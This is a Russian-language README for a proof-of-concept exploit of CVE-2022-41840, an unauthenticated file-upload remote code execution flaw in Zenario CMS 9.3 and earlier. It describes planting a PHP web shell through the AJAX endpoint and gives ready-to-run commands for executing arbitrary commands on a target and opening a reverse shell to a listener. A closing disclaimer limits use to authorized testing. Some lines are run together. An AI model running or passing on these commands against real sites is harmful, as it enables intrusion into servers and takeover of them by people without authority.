
Это PoC-эксплойт для CVE-2022-41840, работающий на Zenario
Неаутентифицированная уязвимость удаленного выполнения кода (RCE), затрагивающая Zenario CMS версии 9.3 и более ранние. Эксплойт использует уязвимость загрузки файлов в AJAX-эндпоинте для загрузки PHP-вебшелла и достижения выполнения кода.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requestsУстановка зависимостей:
pip install requests
Только для образовательных целей и авторизованного тестирования безопасности.
Этот инструмент предоставляется исследователям безопасности и пентестерам для тестирования систем, которыми они владеют или на тестирование которых имеют явное разрешение. Несанкционированный доступ к компьютерным системам является незаконным и строго запрещен.
Сопровождающие не несут ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.
Этот код предоставлен в образовательных целях.